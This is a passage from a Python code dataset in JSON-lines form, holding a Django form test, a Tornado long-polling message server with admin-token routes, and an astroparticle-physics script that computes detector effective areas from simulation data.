"usage_type": "call"}, {"api_name": "alembic.op", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "564437857", "text": "from __future__ import unicode_literals\n\nimport datetime\n\nimport mock\n\nimport pytz\n\nfrom tracpro.test import factories\nfrom tracpro.test.cases import TracProTest\n\nfrom .. import forms\n\n\nclass TestPollChartFilterForm(TracProTest):\n\n def setUp(self):\n super(TestPollChartFilterForm, self).setUp()\n\n self.org = factories.Org()\n\n # Mock time-dependent utilities so that there is a testable result.\n self.month_range_patcher1 = mock.patch('tracpro.polls.forms.get_month_range')\n self.mock_get_month_range1 = self.month_range_patcher1.start()\n self.mock_get_month_range1.return_value = (\n datetime.datetime(2016, 2, 1, tzinfo=pytz.UTC),\n datetime.datetime(2016, 3, 1, tzinfo=pytz.UTC),\n )\n self.month_range_patcher2 = mock.patch('tracpro.charts.filters.get_month_range')\n self.mock_get_month_range2 = self.month_range_patcher2.start()\n self.mock_get_month_range2.return_value = (\n datetime.datetime(2016, 2, 1, tzinfo=pytz.UTC),\n datetime.datetime(2016, 3, 1, tzinfo=pytz.UTC),\n )\n\n # Data to pass to form for testing.\n self.data = {\n 'numeric': 'response-rate',\n 'date_range': 'custom',\n 'start_date': datetime.datetime(2014, 1, 15, tzinfo=pytz.UTC),\n 'end_date': datetime.datetime(2014, 10, 22, tzinfo=pytz.UTC),\n 'split_regions': False,\n }\n\n def tearDown(self):\n super(TestPollChartFilterForm, self).tearDown()\n self.month_range_patcher1.stop()\n self.month_range_patcher2.stop()\n\n def test_initial(self):\n \"\"\"Default data should be set if data is not passed to the form.\"\"\"\n form = forms.PollChartFilterForm(org=self.org)\n self.assertTrue(form.is_bound)\n self.assertTrue(form.is_valid())\n self.assertDictEqual(form.data, {\n 'numeric': 'sum',\n 'date_range': 'month',\n 'start_date': datetime.datetime(2016, 2, 1, tzinfo=pytz.UTC),\n 'end_date': datetime.datetime(2016, 2, 29, tzinfo=pytz.UTC),\n 'split_regions': False,\n })\n\n def test_numeric_required(self):\n \"\"\"Data type choice is required.\"\"\"\n self.data.pop('numeric')\n form = forms.PollChartFilterForm(org=self.org, data=self.data)\n self.assertFalse(form.is_valid())\n self.assertDictEqual(form.errors, {\n 'numeric': ['This field is required.'],\n })\n\n def test_numeric_invalid(self):\n \"\"\"Data type must come from list of valid choices.\"\"\"\n self.data['numeric'] = 'invalid'\n form = forms.PollChartFilterForm(org=self.org, data=self.data)\n self.assertFalse(form.is_valid())\n self.assertDictEqual(form.errors, {\n 'numeric': ['Select a valid choice. '\n 'invalid is not one of the available choices.'],\n })\n", "sub_path": "tracpro/polls/tests/test_forms.py", "file_name": "test_forms.py", "file_ext": "py", "file_size_in_byte": 2907, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "tracpro.test.cases.TracProTest", "line_number": 15, "usage_type": "name"}, {"api_name": "tracpro.test.factories.Org", "line_number": 20, "usage_type": "call"}, {"api_name": "tracpro.test.factories", "line_number": 20, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 26, "usage_type": "call"}, {"api_name": "pytz.UTC", "line_number": 26, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 27, "usage_type": "call"}, {"api_name": "pytz.UTC", "line_number": 27, "usage_type": "attribute"}, {"api_name": "mock.patch", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "call"}, {"api_name": "pytz.UTC", "line_number": 32, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "call"}, {"api_name": "pytz.UTC", "line_number": 33, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "call"}, {"api_name": "pytz.UTC", "line_number": 40, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 41, "usage_type": "call"}, {"api_name": "pytz.UTC", "line_number": 41, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 58, "usage_type": "call"}, {"api_name": "pytz.UTC", "line_number": 58, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 59, "usage_type": "call"}, {"api_name": "pytz.UTC", "line_number": 59, "usage_type": "attribute"}]} +{"seq_id": "358274354", "text": "import logging\r\nimport tornado.escape\r\nimport tornado.ioloop\r\nimport tornado.web\r\nimport tornado.httpserver\r\nimport os.path\r\nimport uuid\r\n\r\nfrom tornado.concurrent import Future\r\nfrom tornado import gen\r\nfrom tornado.options import define, options, parse_command_line\r\nfrom tornado.web import HTTPError\r\nBASE_DIR = os.path.dirname(__file__)\r\ndefine(\"port\", default=8888, help=\"run on the given port\", type=int)\r\ndefine(\"debug\", default=False, help=\"run in debug mode\")\r\ndefine(\"max_cache_msg\", default=200, help=\"max cache message size\", type=int)\r\ndefine(\"max_channel\", default=50, help=\"max channel size\", type=int)\r\ndefine(\"max_admin_token\", default=50, help=\"max admin size\", type=int)\r\ndefine('admin_token', multiple=True)\r\ndefine('config', default=os.path.join(BASE_DIR, 'wxcomet.conf'), help='wxcomet config file')\r\ndefine('login_url', default='/admin/login', help='login url for admin token')\r\n\r\n\r\nclass MessageChannel(object):\r\n def __init__(self, **kwargs):\r\n self.waiters = set()\r\n self.cache = []\r\n self.cache_size = kwargs['cache'] if kwargs.get('cache') else options.max_cache_msg\r\n self.name = kwargs['name'] if kwargs.get('name') else uuid.uuid4().hex\r\n self.token = kwargs['token'] if kwargs.get('token') else uuid.uuid4().hex\r\n\r\n def wait_for_messages(self, cursor=None):\r\n # Construct a Future to return to our caller. This allows\r\n # wait_for_messages to be yielded from a coroutine even though\r\n # it is not a coroutine itself. We will set the result of the\r\n # Future when results are available.\r\n result_future = Future()\r\n if cursor:\r\n new_count = 0\r\n for msg in reversed(self.cache):\r\n if msg[\"id\"] == cursor:\r\n break\r\n new_count += 1\r\n if new_count:\r\n result_future.set_result(self.cache[-new_count:])\r\n return result_future\r\n self.waiters.add(result_future)\r\n return result_future\r\n\r\n def info(self):\r\n return dict(name=self.name, token=self.token,\r\n cache=len(self.cache), waiter=len(self.waiters))\r\n\r\n def __str__(self):\r\n return \"%r listeners, %r msg\"%(len(self.waiters), len(self.cache))\r\n\r\n def cancel_wait(self, future):\r\n self.waiters.remove(future)\r\n # Set an empty result to unblock any coroutines waiting.\r\n future.set_result([])\r\n\r\n def new_messages(self, messages):\r\n logging.debug(\"Sending new message to %r listeners from channel-%s\", len(self.waiters), self.name)\r\n for future in self.waiters:\r\n future.set_result(messages)\r\n self.waiters = set()\r\n self.cache.extend(messages)\r\n if len(self.cache) > self.cache_size:\r\n self.cache = self.cache[-self.cache_size:]\r\n\r\n def close(self):\r\n logging.info(\"close channel %s, %d listeners, %d msg\", self.name)\r\n for future in self.waiters:\r\n self.cancel_wait(future)\r\n\r\nclass MessageUpdatesHandler(tornado.web.RequestHandler):\r\n @gen.coroutine\r\n def get(self):\r\n cursor = self.get_argument(\"cursor\", None)\r\n self.name = self.get_argument('name')\r\n # token = self.get_argument('token', None)\r\n c = self.application.channel(self.name)\r\n if c:\r\n self.future = c.wait_for_messages(cursor=cursor)\r\n messages = yield self.future\r\n else:\r\n raise HTTPError(403, \"channel %s is not in server or token error\",\r\n self.name)\r\n\r\n if self.request.connection.stream.closed():\r\n return\r\n self.write(dict(messages=messages))\r\n\r\n\r\n def on_connection_close(self):\r\n if self.future:\r\n c = self.application.channel(self.name)\r\n if c:\r\n c.cancel_wait(self.future)\r\n\r\n\r\n\r\nclass BaseHandler(tornado.web.RequestHandler):\r\n TOKEN_NAME = 'token'\r\n def get_current_user(self):\r\n token = self.get_argument(self.TOKEN_NAME, None)\r\n if options.admin_token:\r\n if token and token in options.admin_token:\r\n # TODO: make token safe\r\n return {'token':token, 'name':\"admin\"}\r\n else:\r\n return {\"name\":\"anonymous\", \"token\":None}\r\n\r\n def info(self):\r\n name = self.get_argument('name', None)\r\n token = self.get_argument('token', None)\r\n if self.current_user:\r\n # admin\r\n c = self.application.channel(name=name, create=True);\r\n if c: self.write(c.info())\r\n elif name and token:\r\n # user\r\n c = self.application.channel(name=name)\r\n if c and c.token == token:\r\n return self.write(c.info())\r\n else:\r\n raise HTTPError(400)\r\n\r\n def push(self):\r\n message = {\r\n \"id\": str(uuid.uuid4()),\r\n \"content\": self.get_argument(\"content\"),\r\n }\r\n name = self.get_argument(\"name\") # auto raise the argumen missing error\r\n logging.info(\"push message %s in channel %s\", message[\"id\"], name)\r\n self.application.broadcast(name, message)\r\n self.write({\"success\":True})\r\n\r\n def broadcast(self):\r\n message = {\r\n \"id\": str(uuid.uuid4()),\r\n \"content\": self.get_argument(\"content\"),\r\n }\r\n logging.info(\"broadcast message %s \", message[\"id\"])\r\n self.application.broadcast(None, message)\r\n self.write({\"success\":True})\r\n\r\nclass AuthLoginHandler(BaseHandler):\r\n def get(self):\r\n if self.current_user:\r\n self.write(\"hello %s, welcome\"%self.current_user['name'])\r\n else:\r\n raise HTTPError(400)\r\n\r\nclass AdminHandler(BaseHandler):\r\n def _get_or_post(self):\r\n action = self.get_argument('action', None)\r\n name = self.get_argument('name', None)\r\n if not action:\r\n raise HTTPError(400)\r\n elif action == 'info':\r\n self.info()\r\n elif action == 'push':\r\n self.push()\r\n elif action == 'broadcast':\r\n self.broadcast()\r\n\r\n @tornado.web.authenticated\r\n def get(self):\r\n self._get_or_post()\r\n\r\n @tornado.web.authenticated\r\n def post(self):\r\n self._get_or_post()\r\n\r\nclass wxCometApplication(tornado.web.Application):\r\n def __init__(self):\r\n handlers = [\r\n (r\"/a/message/updates\", MessageUpdatesHandler),\r\n (r\"/admin\", AdminHandler),\r\n (r\"/admin/login\", AuthLoginHandler),\r\n ]\r\n settings = dict(\r\n debug=options.debug,\r\n login_url = options.login_url\r\n )\r\n super(wxCometApplication, self).__init__(handlers, **settings)\r\n\r\n self._channels = dict()\r\n self.channel(name='default', create=True)\r\n\r\n def channel(self, name='default', create=False, **kwargs):\r\n \"\"\"get channel by name\r\n \"\"\"\r\n if not name:\r\n name = 'default'\r\n if name in self._channels:\r\n return self._channels[name]\r\n elif create:\r\n if len(self._channels) >= options.max_channel:\r\n logging.warning('too many channel, can not create new channnel %s', name)\r\n return None\r\n logging.info('create a new channel %s', name)\r\n self._channels[name] = MessageChannel(name=name, **kwargs)\r\n return self._channels[name]\r\n else:\r\n return None\r\n\r\n def broadcast(self, name, message):\r\n if name:\r\n c = self.channel(name)\r\n if c:\r\n c.new_messages([message])\r\n else:\r\n for c in self._channels.values():\r\n c.new_messages([message])\r\n\r\n\r\ndef main():\r\n parse_command_line()\r\n if options.config:\r\n options.parse_config_file(options.config)\r\n http_server = tornado.httpserver.HTTPServer(wxCometApplication())\r\n http_server.listen(options.port)\r\n tornado.ioloop.IOLoop.current().start()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n", "sub_path": "wxcomet/wxcomet.py", "file_name": "wxcomet.py", "file_ext": "py", "file_size_in_byte": 8059, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.path.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 13, "usage_type": "name"}, {"api_name": "tornado.options.define", "line_number": 14, "usage_type": "call"}, {"api_name": "tornado.options.define", "line_number": 15, "usage_type": "call"}, {"api_name": "tornado.options.define", "line_number": 16, "usage_type": "call"}, {"api_name": "tornado.options.define", "line_number": 17, "usage_type": "call"}, {"api_name": "tornado.options.define", "line_number": 18, "usage_type": "call"}, {"api_name": "tornado.options.define", "line_number": 19, "usage_type": "call"}, {"api_name": "tornado.options.define", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 20, "usage_type": "name"}, {"api_name": "tornado.options.define", "line_number": 21, "usage_type": "call"}, {"api_name": "tornado.options.options.max_cache_msg", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tornado.options.options", "line_number": 28, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 29, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 30, "usage_type": "call"}, {"api_name": "tornado.concurrent.Future", "line_number": 37, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 63, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 72, "usage_type": "call"}, {"api_name": "tornado.escape.web", "line_number": 76, "usage_type": "attribute"}, {"api_name": "tornado.escape", "line_number": 76, "usage_type": "name"}, {"api_name": "tornado.web.HTTPError", "line_number": 87, "usage_type": "call"}, {"api_name": "tornado.gen.coroutine", "line_number": 77, "usage_type": "attribute"}, {"api_name": "tornado.gen", "line_number": 77, "usage_type": "name"}, {"api_name": "tornado.escape.web", "line_number": 103, "usage_type": "attribute"}, {"api_name": "tornado.escape", "line_number": 103, "usage_type": "name"}, {"api_name": "tornado.options.options.admin_token", "line_number": 107, "usage_type": "attribute"}, {"api_name": "tornado.options.options", "line_number": 107, "usage_type": "name"}, {"api_name": "tornado.options.options.admin_token", "line_number": 108, "usage_type": "attribute"}, {"api_name": "tornado.options.options", "line_number": 108, "usage_type": "name"}, {"api_name": "tornado.web.HTTPError", "line_number": 127, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 131, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 135, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 141, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 144, "usage_type": "call"}, {"api_name": "tornado.web.HTTPError", "line_number": 153, "usage_type": "call"}, {"api_name": "tornado.web.HTTPError", "line_number": 160, "usage_type": "call"}, {"api_name": "tornado.escape.web", "line_number": 168, "usage_type": "attribute"}, {"api_name": "tornado.escape", "line_number": 168, "usage_type": "name"}, {"api_name": "tornado.escape.web", "line_number": 172, "usage_type": "attribute"}, {"api_name": "tornado.escape", "line_number": 172, "usage_type": "name"}, {"api_name": "tornado.escape.web", "line_number": 176, "usage_type": "attribute"}, {"api_name": "tornado.escape", "line_number": 176, "usage_type": "name"}, {"api_name": "tornado.options.options.debug", "line_number": 184, "usage_type": "attribute"}, {"api_name": "tornado.options.options", "line_number": 184, "usage_type": "name"}, {"api_name": "tornado.options.options.login_url", "line_number": 185, "usage_type": "attribute"}, {"api_name": "tornado.options.options", "line_number": 185, "usage_type": "name"}, {"api_name": "tornado.options.options.max_channel", "line_number": 200, "usage_type": "attribute"}, {"api_name": "tornado.options.options", "line_number": 200, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 201, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 203, "usage_type": "call"}, {"api_name": "tornado.options.parse_command_line", "line_number": 220, "usage_type": "call"}, {"api_name": "tornado.options.options.config", "line_number": 221, "usage_type": "attribute"}, {"api_name": "tornado.options.options", "line_number": 221, "usage_type": "name"}, {"api_name": "tornado.options.options.parse_config_file", "line_number": 222, "usage_type": "call"}, {"api_name": "tornado.options.options", "line_number": 222, "usage_type": "name"}, {"api_name": "tornado.options.options.config", "line_number": 222, "usage_type": "attribute"}, {"api_name": "tornado.escape.httpserver.HTTPServer", "line_number": 223, "usage_type": "call"}, {"api_name": "tornado.escape.httpserver", "line_number": 223, "usage_type": "attribute"}, {"api_name": "tornado.escape", "line_number": 223, "usage_type": "name"}, {"api_name": "tornado.options.options.port", "line_number": 224, "usage_type": "attribute"}, {"api_name": "tornado.options.options", "line_number": 224, "usage_type": "name"}, {"api_name": "tornado.escape.ioloop.IOLoop.current", "line_number": 225, "usage_type": "call"}, {"api_name": "tornado.escape.ioloop", "line_number": 225, "usage_type": "attribute"}, {"api_name": "tornado.escape", "line_number": 225, "usage_type": "name"}]} +{"seq_id": "648002266", "text": "\"\"\"effectiveAreaCalculator_v5.\nUsage: effectiveAreaCalculator.py PRE POST MC MODELS OUTPUT EMIN EMAX ZENMAX EBINS ZENBINS BATCHES [--read_pickle]\n\n-h --help Show this screen.\nPRE Input path to HDF5 file containing (pre-sim) mgs-data.\nPOST Input path to HDF5 file containing (level 4) mgs-data.\nMC Input path to HDF5 file containing (level 4) corsica data.\nMODELS Input path to pickle file containing models.\nOUTPUT Output path.\nEMIN Lower Limit of energy interval (logscale: 10^EMIN).\nEMAX Upper limit of energy interval (logscale: 10^EMAX).\nZENMAX Upper Limit of zenith interval\nEBINS Number of energy intervals.\nZENBINS Number of zenith intervals.\nBATCHES Number of batches to split up input.\n--read_pickle Flag determining weather corsica data have to be read from hdf5 or from pickle\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport h5py\nfrom docopt import docopt\nfrom sklearn.externals import joblib\nfrom dataMethods_mgs import load_data as load_data_mgs\nfrom dataMethods_corsica import load_data as load_data_corsica\n\nr_sim = 800\nh_sim = 1600\nA_sim = 2 * np.pi * r_sim * h_sim + 2 * np.pi * r_sim**2\n\n\ndef gen_labels(label, att):\n \"\"\"Generates Labels from data.\n\n Parameters\n ----------\n label : Pandas Dataframe\n Labels\n\n att : Pandas Dataframe\n Attributes\n\n Returns\n -------\n labels_S : array, shape=(len(lab),)\n Label for S classification\n\n labels_Q : array, shape=(len(lab),)\n Label for Q classification\n\n labels_M : array, shape=(len(lab),)\n Label for M classification\n\n labels_R : array, shape=(len(lab),)\n Label for R regression\n \"\"\"\n label_S = (label[\"Hoinka_Labels_label_in\"].values == 1.0)\n label_M = (label[\"Hoinka_Labels_n_mu_stop\"].values == 1) & label_S\n label_R = label[\"Hoinka_Labels_true_stop_z\"].values\n zenith_splinempe = att[\"Hoinka_zenith_SplineMPE\"].values\n zenith_true = label[\"Hoinka_Labels_zenith_true\"].values\n azimuth_splinempe = att[\"Hoinka_azimuth_SplineMPE\"].values\n azimuth_true = label[\"Hoinka_Labels_azimuth_true\"].values\n ang_error = np.arccos(np.cos(azimuth_true-azimuth_splinempe) * np.sin(zenith_true) * np.sin(zenith_splinempe) +\n np.cos(zenith_true) * np.cos(zenith_splinempe))\n # label_Q = (ang_error < 0.1)\n label_Q = np.log10(ang_error)\n return label_S, label_Q, label_M, label_R\n\n\ndef calc_generated_area(radius, height, zenith):\n return np.pi * 2 * radius * np.cos(zenith) + 2 * radius * height * np.sin(zenith)\n\n\ndef main(input_pre, input_post, mc_input, model_path, output, eMin, eMax, zenMax, ebins, zenbins, n_batches,\n read_pickle=False):\n cut = zenMax / 180 * np.pi\n\n print(\"*****Step1: calculate effective area by zenith angle from muon gun data\")\n\n result = None\n\n input_pre_list = input_pre.split(\",\")\n input_post_list = input_post.split(\",\")\n\n total_count = 0\n l4_count = 0\n ssm_true_count = 0\n ssm_est_count = 0\n ssm_est_hq_count = 0\n\n for i in range(len(input_pre_list)):\n f_pre = input_pre_list[i]\n f_post = input_post_list[i]\n print(\"Loading data from %s and %s ...\" % (f_pre, f_post))\n\n file_pre = h5py.File(f_pre)\n file_post = h5py.File(f_post)\n\n steps_pre = np.linspace(0, file_pre['Hoinka_Labels'].size, num=n_batches+1).astype(int)\n steps_post = np.linspace(0, file_post['Hoinka_Labels'].size, num=n_batches+1).astype(int)\n\n intervals_pre = [(steps_pre[i], steps_pre[i + 1]) for i in range(len(steps_pre) - 1)]\n intervals_post = [(steps_post[i], steps_post[i + 1]) for i in range(len(steps_post) - 1)]\n\n for n, batches in enumerate(zip(intervals_pre, intervals_post)):\n print(\"...Processing batch %i\" % n)\n\n # read labeled (pre-sim) mgs-data\n # pre_data = pd.read_hdf(input_pre, key='Hoinka_Labels')\n pre_data, _, pre_data_weight, _ = load_data_mgs(file_pre, batches[0], verbosity=False)\n pre_data['MuonWeight'] = pre_data_weight\n store_total = len(pre_data.index)\n pre_data= pre_data[pre_data.Hoinka_Labels_zenith_true < cut]\n true_stopping = pre_data[pre_data.Hoinka_Labels_label_in > 0][\n ['Hoinka_Labels_azimuth_true', 'Hoinka_Labels_zenith_true', 'Hoinka_Labels_energy_stop',\n 'Hoinka_Labels_true_stop_z', 'Hoinka_Labels_n_mu_stop', 'MuonWeight']]\n\n pre_data.reset_index(inplace=True, drop=True)\n pre_data['Hoinka_Labels_zenith_true_cos'] = np.cos(pre_data.Hoinka_Labels_zenith_true)\n\n true_stopping.reset_index(inplace=True, drop=True)\n true_stopping['Hoinka_Labels_zenith_true_cos'] = np.cos(true_stopping.Hoinka_Labels_zenith_true)\n\n # import models\n models = joblib.load(model_path)\n\n # read level 3 mgs-data\n post_data, att, post_data_weight, _ = load_data_mgs(file_post, batches[1], verbosity=False)\n\n store_l4 = len(post_data.index)\n\n # apply s-classificator to level3 data\n proba_s = models['s'][1].predict_proba(att[models['s'][0]])[:, 1]\n proba_m = models['m'][1].predict_proba(att[models['m'][0]])[:, 1]\n predict_q = models['q'][1].predict(att[models['q'][0]])\n zenith_splinempe = att[\"Hoinka_zenith_SplineMPE\"]\n del att\n\n # apply cut to labeled level 3 data at 0.74 for 95% purity\n # post_data = pd.read_hdf(input_post, key='Hoinka_Labels')\n post_data['MuonWeight'] = post_data_weight\n predicted_stopping = post_data[(proba_m > 0.79) & (predict_q < -0.6) & (zenith_splinempe < cut)][\n ['Hoinka_Labels_azimuth_true', 'Hoinka_Labels_zenith_true', 'Hoinka_Labels_energy_stop',\n 'Hoinka_Labels_true_stop_z', 'Hoinka_Labels_n_mu_stop', 'MuonWeight']]\n\n predicted_stopping.reset_index(inplace=True, drop=True)\n predicted_stopping['Hoinka_Labels_zenith_true_cos'] = np.cos(predicted_stopping.Hoinka_Labels_zenith_true)\n\n # perform aggregation and store results\n zen_bins = np.linspace(np.cos(cut), 1, num=zenbins+1)\n\n pre_data['zen_bin'] = pd.cut(pre_data['Hoinka_Labels_zenith_true_cos'], zen_bins)\n pre_data_agg = pre_data[['MuonWeight', 'zen_bin']].groupby('zen_bin').sum()\n\n true_stopping['zen_bin'] = pd.cut(true_stopping['Hoinka_Labels_zenith_true_cos'], zen_bins)\n true_stopping_agg = true_stopping[['MuonWeight', 'zen_bin']].groupby('zen_bin').sum()\n\n predicted_stopping['zen_bin'] = pd.cut(predicted_stopping['Hoinka_Labels_zenith_true_cos'], zen_bins)\n predicted_stopping_agg = predicted_stopping[['MuonWeight', 'zen_bin']].groupby('zen_bin').sum()\n\n if result is None:\n result = pd.concat({'true_count': true_stopping_agg, 'predicted_count': predicted_stopping_agg,\n 'total_count': pre_data_agg}, axis=1)\n result.fillna(0, inplace=True)\n else:\n result.true_count += true_stopping_agg.fillna(0)\n result.predicted_count += predicted_stopping_agg.fillna(0)\n result.total_count += pre_data_agg.fillna(0)\n\n total_count += store_total\n l4_count += store_l4\n ssm_true_count += len(post_data[post_data.Hoinka_Labels_label_in > 0].index)\n ssm_est_count += len(post_data[(proba_m > 0.79)].index)\n ssm_est_hq_count += len(post_data[(proba_m > 0.79) & (predict_q < -0.6) & (zenith_splinempe < cut)].index)\n\n # prevent divisions by zero\n result.total_count = result['total_count'].replace(0.0, 1.0)\n result.true_count = result['true_count'].replace(0.0, 1.0)\n\n # calc effective areas\n result['effective_area'] = A_sim * result['predicted_count'] / result['true_count']\n result['effective_area_total'] = A_sim * result['predicted_count'] / result['total_count']\n\n result.to_csv(\"%s/effArea_mgs.csv\" % output, sep='\\t')\n\n joblib.dump(result, \"%s/effArea_mgs.pickle\" % output)\n\n print('total_count : %i' % total_count)\n print('l4_count : %i' % l4_count)\n print('ssm_true_count : %i' % ssm_true_count)\n print('ssm_est_count : %i' % ssm_est_count)\n print('ssm_est_hq_count : %i' % ssm_est_hq_count)\n\n print(\"*****Step2: calculate effective area by muon energy from corsica data\")\n\n if read_pickle == False:\n # read corsica mc data and write to df\n df_list_true = []\n df_list_est = []\n\n for f in mc_input.split(\",\"):\n print(\"Loading data from %s ...\" % f)\n\n file = h5py.File(f)\n n_input_lines = file['Hoinka_Labels'].size\n\n steps = np.linspace(0, n_input_lines, num=n_batches+1).astype(int)\n\n intervals = [(steps[i], steps[i + 1]) for i in range(len(steps) - 1)]\n\n for n, batch in enumerate(intervals):\n print(\"...Processing batch %i\" % n)\n lab, att, wgt, grp = load_data_corsica(file, batch, verbosity=False)\n\n models = joblib.load(model_path)\n\n proba_s = models['s'][1].predict_proba(att[models['s'][0]])[:, 1]\n estimate_q = models['q'][1].predict(att[models['q'][0]])\n proba_m = models['m'][1].predict_proba(att[models['m'][0]])[:, 1]\n estimate_r = models['r'][1].predict(att[models['r'][0]])\n\n lab_s, lab_q, lab_m, lab_r = gen_labels(lab, att)\n\n df = pd.DataFrame({'single_stopping': lab_m,\n 'quality': lab_q,\n 'zenith': lab[\"Hoinka_Labels_zenith_true\"],\n 'stop_z': lab[\"Hoinka_Labels_true_stop_z\"],\n 'energy_stop': lab[\"Hoinka_Labels_energy_stop\"],\n 'weight': wgt['G3'],\n 'weight_G4': wgt['G4'],\n 'weight_H': wgt['H']})\n\n df2 = pd.DataFrame({'single_stopping': proba_m,\n 'quality': estimate_q,\n 'zenith': att[\"Hoinka_zenith_SplineMPE\"],\n 'stop_z': estimate_r,\n 'energy_stop': lab[\"Hoinka_Labels_energy_stop\"],\n 'weight': wgt['G3'],\n 'weight_G4': wgt['G4'],\n 'weight_H': wgt['H']})\n\n df_list_true += [df]\n df_list_est += [df2]\n\n result_mc = pd.concat(df_list_true).reset_index()\n result_mc_est = pd.concat(df_list_est).reset_index()\n\n result_mc['zenith_cos'] = np.cos(result_mc.zenith)\n result_mc_est['zenith_cos'] = np.cos(result_mc_est.zenith)\n\n # store readout\n joblib.dump(result_mc, \"%s/df_corsica.pickle\" % output)\n joblib.dump(result_mc_est, \"%s/df_corsica_est.pickle\" % output)\n else:\n print(\"Loading data from %s/df_corsica.pickle ...\" % output)\n result_mc = joblib.load(\"%s/df_corsica.pickle\" % output)\n print(\"Loading data from %s/df_corsica_est.pickle ...\" % output)\n result_mc_est = joblib.load(\"%s/df_corsica_est.pickle\" % output)\n\n # reduce to single stopping events with zenith below max\n result_mc = result_mc[(result_mc.single_stopping) & (result_mc.zenith < cut)]\n\n # retrieve effective area by zenith from previous result\n zen_bins = np.linspace(np.cos(cut), 1, num=zenbins+1)\n result_mc['zen_bin'] = pd.cut(result_mc.zenith_cos, zen_bins)\n result_mc['effective_area'] = result.effective_area.loc[result_mc.zen_bin].values\n result_mc['effective_area_total'] = result.effective_area_total.loc[result_mc.zen_bin].values\n\n # aggregate by muon energy\n e_bins = np.logspace(np.log10(eMin), np.log10(eMax), num=ebins+1)\n result_mc['e_bin'] = pd.cut(result_mc.energy_stop, e_bins)\n\n result_mc.dropna(inplace=True)\n\n result_mc_agg = result_mc[['effective_area', 'e_bin']].groupby('e_bin').\\\n agg(lambda x: np.average(x,weights=result_mc.loc[x.index, \"weight\"]))\n\n result_mc_agg.fillna(0.0, inplace=True)\n\n result_mc_agg_total = result_mc[['effective_area_total', 'e_bin']].groupby('e_bin'). \\\n agg(lambda x: np.average(x, weights=result_mc.loc[x.index, \"weight\"]))\n\n result_mc_agg.fillna(0.0, inplace=True)\n\n # store aggregation result\n result_mc_agg.to_csv(\"%s/effArea_mgs_corsica.csv\" % output, sep='\\t')\n result_mc_agg_total.to_csv(\"%s/effArea_mgs_corsica_total.csv\" % output, sep='\\t')\n\n joblib.dump(result_mc_agg, \"%s/effArea_mgs_corsica.pickle\" % output)\n joblib.dump(result_mc_agg_total, \"%s/effArea_mgs_corsica_total.pickle\" % output)\n\n print(\"*****Finished Succesfull!\")\n\n\nif __name__ == \"__main__\":\n args = docopt(__doc__)\n main(args[\"PRE\"], args[\"POST\"], args[\"MC\"], args[\"MODELS\"], args[\"OUTPUT\"], float(args[\"EMIN\"]),\n float(args[\"EMAX\"]), float(args[\"ZENMAX\"]), int(args[\"EBINS\"]), int(args[\"ZENBINS\"]), int(args[\"BATCHES\"]),\n args[\"--read_pickle\"])\n", "sub_path": "effectiveAreaEstimation/effectiveAreaCalculator.py", "file_name": "effectiveAreaCalculator.py", "file_ext": "py", "file_size_in_byte": 13243, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.pi", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.arccos", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 72, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 77, "usage_type": "attribute"}, {"api_name": "h5py.File", "line_number": 97, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 101, "usage_type": "call"}, {"api_name": "dataMethods_mgs.load_data", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 123, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.load", "line_number": 126, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 126, "usage_type": "name"}, {"api_name": "dataMethods_mgs.load_data", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 151, "usage_type": "call"}, {"api_name": "pandas.cut", 